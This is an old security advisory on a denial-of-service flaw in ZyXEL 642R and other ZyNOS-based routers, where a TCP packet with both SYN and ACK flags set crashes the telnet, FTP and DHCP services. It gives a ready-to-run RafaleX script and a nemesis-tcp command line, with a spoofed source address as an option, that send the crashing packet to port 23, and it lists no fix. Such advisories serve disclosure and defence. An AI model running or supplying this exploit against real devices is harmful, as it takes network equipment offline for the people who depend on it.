|
COMMAND ZyXEL ZyNOS remote service DoS SYSTEMS AFFECTED ZyXEL 642R(-11) AJ.6 and other routers based on ZyNOS PROBLEM Ueli Kistler [iuk@gmx.ch] of eclipse [http://www.packx.net][http://www.eclipse.fr.fm], says : A ZyXEL router service can be crashed by sending a packet with TCP flags ACK and SYN set at the same time. The service will not be available even through RS-232. Using a SYN-FIN packet will make inaccessible the service port for a few minutes. Affected services on ZyXEL 642R-11 are: TELNET, FTP and DHCP (if enabled). TELNET and FTP cannot be deactivated. Exploit ------- # This is a RafaleX script (Download: www.packx.net) # Rafale X script # --------------- # Action : Make a ZyXEL 642R Prestige Router inaccessible on port 23 # %name=ZyXEL telnet service DoS %category=Denial of service %date=23-05-2002 %rafalemin=0.2 %description=Crash ZyXEL router telnet service with ACK and SYN flag // Variables $done=Target attacked... // Do the stuff... !Display=Please wait... !Sleep 500 PORTDST=23 IPHEADERSIZE=20 ACK=1 SYN=1 !Display=Sending the packet... !SEND 1 TCP !Sleep 200 !Display=ACK/SYN Packet sent! ZyXEL telnet service crashed (V2.50(AJ.6)) !Sleep 1000 !Display=$done NOTE: Set also these values.. Rafale used this by default: ACK=0, SEQ=0, WIN=0 Example with nemesis: nemesis-tcp -v -S %spoofed IP possible% -D %ZyXEL router% -fS -fA -w 0 -s 0 -a 0 -y 23 SOLUTION None yet